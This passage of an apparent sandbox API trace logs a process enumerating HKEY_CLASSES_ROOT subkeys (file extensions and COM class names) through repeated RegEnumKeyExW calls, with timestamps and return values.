hKey=0x80000000, dwIndex=0xac, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".gif", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xad, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".glox", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xae, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".gmmp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xaf, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".gqsx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xb0, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".gra", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xb1, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".group", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xb2, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".grp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.586] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xb3, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".gz", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xb4, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".h", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xb5, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hdp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xb6, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hhc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xb7, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hlp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xb8, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hol", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xb9, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hpp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xba, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hqx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xbb, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hta", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xbc, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".htc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xbd, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".htm", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xbe, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".html", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xbf, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".htt", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xc0, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".htw", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xc1, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".htx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xc2, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxa", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xc3, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xc4, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxd", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.587] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xc5, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxe", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xc6, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xc7, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxh", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xc8, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxi", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xc9, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxk", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xca, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxq", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xcb, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxr", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xcc, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxs", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xcd, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxt", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xce, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxv", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xcf, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxw", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xd0, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".hxx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xd1, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".i", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xd2, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ibq", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xd3, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".icc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xd4, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".icl", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xd5, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".icm", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xd6, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ico", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xd7, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ics", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.588] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xd8, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".idl", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xd9, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".idq", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xda, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ilk", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xdb, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".imc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xdc, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".imesx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xdd, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".img", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xde, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".inc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xdf, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".inf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xe0, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ini", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xe1, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".inl", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xe2, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".inv", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xe3, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".inx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xe4, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".in_", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xe5, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".iqy", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xe6, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".iso", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xe7, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".IVF", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xe8, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".jar", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xe9, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".jav", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xea, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".java", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xeb, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".jbf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xec, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".jfif", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.589] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xed, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".jnlp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.590] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xee, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".jnt", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.590] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xef, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".Job", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.590] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xf0, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".jod", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.590] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xf1, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".jpe", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.590] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xf2, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".jpeg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.590] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xf3, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".jpg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.590] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xf4, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".js", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.590] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xf5, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".JSE", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.590] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xf6, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".jtx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.590] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xf7, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".jxr", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.590] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xf8, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".kci", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1117, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMINet_Utils.WmiSinkDemultiplexor", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1118, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMINet_Utils.WmiSinkDemultiplexor.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1119, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMISnapinAbout.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x111a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMLSS.WindowsMediaLibrarySharingServices", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x111b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMLSS.WindowsMediaLibrarySharingServices.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x111c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMNetSourcePlugin.NetSourcePlugin", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x111d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WMNetSourcePlugin.NetSourcePlugin.1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.602] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x111e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, 